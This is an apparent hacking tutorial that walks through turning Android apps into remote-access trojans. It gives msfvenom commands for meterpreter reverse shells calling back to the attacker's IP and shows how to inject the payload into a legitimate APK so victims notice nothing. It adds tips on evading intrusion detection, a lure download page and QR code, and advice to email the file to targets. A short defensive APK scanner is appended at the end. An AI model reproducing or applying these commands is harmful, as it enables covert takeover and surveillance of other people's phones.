Basic Android Demo:
APK Injection Demo:
Only use this in a legal and controlled environment and on equipment you are authorized to use in such a manner!
Commands to follow along with the Basic Android Demo video are below.
sudo apt-get install qrencode
Change 192.168.1.102 to your IP address. The command below creates an APK installer file that runs shell code connecting back to your IP. If the victim is on the same network as you, you may use your local IP here; it can be found using the command ifconfig. If the victim is outside of your local network, use your WAN/public IP here. If using your WAN/public IP, be sure port forwarding is enabled in your router and a forward is set for the port specified in the payload to the local IP of your Kali box. You may need to read ahead in this write-up to gather a better understanding of these settings. If Kali is running as a virtual machine, be sure the network adapter is configured for bridged mode. You can find this in your virtual machine settings.
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4590 R > app.apk
########### NOTES ###########
Listed below are some alternative payloads that tunnel traffic through a different protocol. Using HTTPS may evade some intrusion detection as well. Also remember that the victim's ISP/network configuration may be blocking non-standard ports (common), so you may change the ports as you see fit.
sudo msfvenom -p android/meterpreter/reverse_http LHOST=192.168.1.102 LPORT=8080 R > app.apk
sudo msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.102 LPORT=8443 R > app.apk
If you choose to use either of the two payloads listed above instead of the one shown in the video, be sure to select the proper payload listener once you start Armitage.
CUSTOM APK TEMPLATES
The default template is not very convincing as it opens an application that does nothing besides give you a shell. You may use another APK as a template, just Google "App-to-poison APK Download".
First install zipalign using the command:
apt-get install zipalign
Now issue the following command (make sure the APK to poison is in your working directory, else "cd" to it now):
msfvenom -x template-apk-to-poison-here.apk -p android/meterpreter/reverse_https LHOST=IPHERE LPORT=PORTHERE -o app.apk
Now, when the victim installs and opens the poisoned APK, you get a shell while they use the app as normal, completely oblivious.
This is the most realistic method of getting a shell on Android using an msfvenom-generated APK.
########### END NOTES ###########
service apache2 start
Change 192.168.1.102 to your IP Address. Same rules about choosing which IP to use that were mentioned earlier still apply here.
qrencode -l H 'http://192.168.1.102' -o app.png
Copy/paste the following HTML, or modify it for your application:
<html>
  <body>
    <center>
      <h1>Really Cool App!</h1>
      <br>
      <b><a href="/app.apk" target="_blank">Click Here to Download our APP!</a></b>
      <br><br>
      Depending on your QR scanning software you may need to select "open this link in your default web browser" in order to download our APP. Also be sure to <b>temporarily</b> allow installation from unknown sources in your settings when prompted.
    </center>
  </body>
</html>
service postgresql start
Open Armitage from the Main Menu (Applications) - Exploitation Tools - armitage
Select payload->android->meterpreter->reverse_tcp (unless you chose a different payload)
Change LPORT to 4590 (if you are using reverse_tcp and following the video change it to 4590, but if you selected https then use 8443 and for http use 8080, unless you modified those ports creating the payload)
Email the victim the malicious apk file or print the qr code and give it to the victim.
This is a social engineering attack vector, so be creative!
Wait for victim to download, install, and open the program. They will automatically connect to you and their host will appear in the hosts window with red lightning around the icon.
You can also use the console to check sessions with
Only use this knowledge in a legal and controlled manner. We are not responsible for your actions.
To remove the exploit from the phone go to Settings - Apps - Downloaded and uninstall the app "MainActivity".
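The write-up above produces two kinds of artifact on the phone: the stock msfvenom template (which installs as "MainActivity") and a legitimate app repackaged with the payload. As an added example that is not part of the original write-up, the Python script below is the kind of triage check an analyst can run over an APK before it reaches a device. It assumes the stock template's package path is com/metasploit/stage (a renamed package or custom template will not match, which is why it also lists sensitive permissions from a constructed list and checks whether the APK carries a v1 signature block at all, since a repackaged app is re-signed with a different key or not at all). The sample APKs it builds are constructed stand-ins, zips containing only the strings the scanner looks for, not real compiled dex or manifest files.

```python
import io
import re
import zipfile

# Assumption: the stock msfvenom Android template lives under this package path.
# A build with a custom template or renamed package will not match this string.
STAGE_INDICATOR = "com/metasploit/stage"

# Constructed list of permissions a "Really Cool App" has no business requesting.
# These are standard Android permission names; which ones count is a judgement call.
SENSITIVE_PERMISSIONS = [
    "android.permission.SEND_SMS",
    "android.permission.READ_SMS",
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.READ_CALL_LOG",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECEIVE_BOOT_COMPLETED",
]

# File suffixes of v1 (JAR) signature blocks under META-INF/
SIGNATURE_SUFFIXES = (".RSA", ".DSA", ".EC")


def _contains(blob, text):
    """True if text occurs in blob either as plain ASCII (dex string pool)
    or as UTF-16LE (the encoding binary AndroidManifest.xml string pools commonly use)."""
    return text.encode("ascii") in blob or text.encode("utf-16-le") in blob


def scan_apk(apk_bytes):
    """Triage an APK supplied as bytes and return a dict of findings."""
    findings = {"stage_indicator": False, "permissions": [], "signature_files": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        names = apk.namelist()
        # No signature block at all means the APK is unsigned (or only v2+ signed; treat as worth a look)
        findings["signature_files"] = sorted(
            n for n in names
            if n.startswith("META-INF/") and n.upper().endswith(SIGNATURE_SUFFIXES)
        )
        # Search every dex file (classes.dex, classes2.dex, ...) for the template package path
        for name in names:
            if re.fullmatch(r"classes\d*\.dex", name) and _contains(apk.read(name), STAGE_INDICATOR):
                findings["stage_indicator"] = True
        if "AndroidManifest.xml" in names:
            manifest = apk.read("AndroidManifest.xml")
            findings["permissions"] = [p for p in SENSITIVE_PERMISSIONS if _contains(manifest, p)]
    return findings


def verdict(findings):
    """'suspicious' on the template indicator, a missing signature block,
    or two or more sensitive permissions; otherwise 'clean'."""
    if (findings["stage_indicator"]
            or not findings["signature_files"]
            or len(findings["permissions"]) >= 2):
        return "suspicious"
    return "clean"


def build_sample_apk(include_stage, permissions, signed):
    """Constructed stand-in for an APK: a zip holding the three members scan_apk inspects.
    The dex and manifest members contain only the relevant strings, not real compiled data."""
    activity = ("Lcom/metasploit/stage/MainActivity;" if include_stage
                else "Lcom/example/app/MainActivity;")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as apk:
        apk.writestr("classes.dex", b"dex\n035\x00" + activity.encode("ascii"))
        # Binary manifests keep their string pool in UTF-16LE, so mimic that here
        apk.writestr("AndroidManifest.xml", "".join(permissions).encode("utf-16-le"))
        if signed:
            apk.writestr("META-INF/CERT.RSA", b"constructed placeholder, not a real PKCS#7 block")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_apk(True, ["android.permission.SEND_SMS", "android.permission.RECORD_AUDIO"], False)
    result = scan_apk(sample)
    print(result, verdict(result))
```

The string search is deliberately crude so it stays dependency-free: it reads the raw dex and binary-XML bytes rather than parsing them, which is enough to flag the stock template and obviously over-privileged manifests but will miss a payload whose package has been renamed. For a real triage pipeline, the signature check should go further and compare the signing certificate's fingerprint with the one the genuine developer publishes, since that is what a repackaged template APK cannot reproduce.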